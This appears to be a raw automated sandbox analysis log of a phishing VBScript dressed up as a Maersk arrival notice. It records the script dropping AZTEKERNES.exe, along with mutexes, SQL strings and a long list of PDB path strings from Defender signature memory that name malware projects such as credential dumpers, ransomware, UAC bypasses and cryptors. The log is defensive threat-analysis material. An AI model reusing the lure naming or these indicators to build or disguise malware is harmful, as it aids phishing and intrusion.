Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT (SELECT COUNT() FROM File) + (SELECT COUNT() FROM FileInstance);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(25, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT Count(1) FROM BmFileInfo;SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;DELETE FROM BmFileActions;DELETE FROM BmFileInfo;B
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BmFileStartupActions;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Engine(EngineVersion, SigVersion) VALUES(? , ? );

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B57DB1C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetLastError,Process32FirstW,GetLastError,Process32NextW,GetLastError,FindCloseChangeNotification,CloseHandle,

45_2_00007FF7B57DB1C4

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5324:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4740:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Mutant created: \Sessions\1\BaseNamedObjects\VXQYjPtm
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6548:304:WilStaging_02

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B57CB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,

45_2_00007FF7B57CB0C8

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs'

Source: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

ReversingLabs: Detection: 13%

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Jump to behavior

Source:	Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: oyvmhvtgei\bmjc\fee.pdb source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp
Source:	Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: main\payload\payload.x86.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp
Source:	Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp
Source:	Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\binplace.exe source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp
Source:	Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp
Source:	Binary string: he#@1.Pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 0\Adobe Reader.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: \bin\DownloaderExe.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeKrnlR3.pdb source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp
Source:	Binary string: sctasks.pdbd source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp
Source:	Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: reg.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: mgr.pdb source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp
Source:	Binary string: \Release\ComBroadcaster.pdb source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp
Source:	Binary string: b-- b3: bs: bue b1f bss b5+(b---b51-b74-bd6-bf8-bbf-ban-bot-bne.bog.bck.bpk.bm.bup.b.s.but.be /be10b420b180bc01bd31bb91b2c1b-b2b6f2b443b683b7-4bd-4by24b994b8a4b,c4b0c4b{65bd85b-95bfa5bgg5b5j5bd96b2c6bhv6be-7b207bf27b-47b077be87b1a7b4f7b528bi38b478b-88b5-9b7f9b3n9but:bg,?bhi_btn_bio_bro_bbs_bet_b: ab86abs_ab-aab5babgbab.cabadabrdabffabciabgrab[tabstab{tabiuab.wab/wab1-bbc-bb59bb89bbjabbffbbtgbb#jbbcobbcsbbbubb26cba8cb4bcb6ecb4fcbyhcbdmcbcpcbipcb-tcb.db</dbe0db27dbpadbbbdbccdb\ddbbddb6edbmodboodb.pdbrrdb-4ebhbeb\debhgebehebtiebklebulebomebjoeb.rebirebprebosebrvebrwebmzeb source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp
Source:	Binary string: bot.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: comp.pdbd source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: 'C:\postmaster\merge\Peasants\Billy.pdb] source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: c:\Documents and Settings\Administrator\My Documents\Visual Studio Projects\EASZZCDFR\Release\EASZZCDFR.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: -C:\backward\inch\enumeration\Atmel\neces.pdb source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: KF.+:\\Projects\\Crypt\\Stub2005\\Stub2005\\Stub\\Stub\\Release\\.*.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb] source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: .+:\\src\\tcrypt\\Release\\s_(high\|low).pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: CryptoService.pdb source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: Asource\repos\Coronavirus1\Coronavirus1\obj\Debug\Coronavirus1.pdb] source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp
Source:	Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \mywscript.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: 0.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdbx source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: cleanmgr.pdbPE source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: \[Release.Win32]Clicker.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp
Source:	Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp
Source:	Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp
Source:	Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-registry-l1-1-0.pdb<b`- source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-com-l1-1-0.pdb' source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp
Source:	Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!%WINDIR%\Microsoft.NET\mscorsvw.exe source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: mshta.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: D:\developement\projects\flood_load\Release\flood_load.pdb source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: ddraw.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp
Source:	Binary string: wbadmin.pdb source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp
Source:	Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: Unite.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: z:\Projects\Rescator\uploader\Debug\scheck.pdb] source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp
Source:	Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp
Source:	Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: Flipopia.pdb source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp
Source:	Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: Users\Legion\source\repos\curl\Release\curl.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: S\\server\\V.\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\Narrator.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: rasautou.pdb source: MpSigStub.exe, 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp
Source:	Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: 9D:\BuildScript.NET\c2patchdx11\pc\Build\Bin32\Crysis2.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: BugTrap.pdb] source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp
Source:	Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp
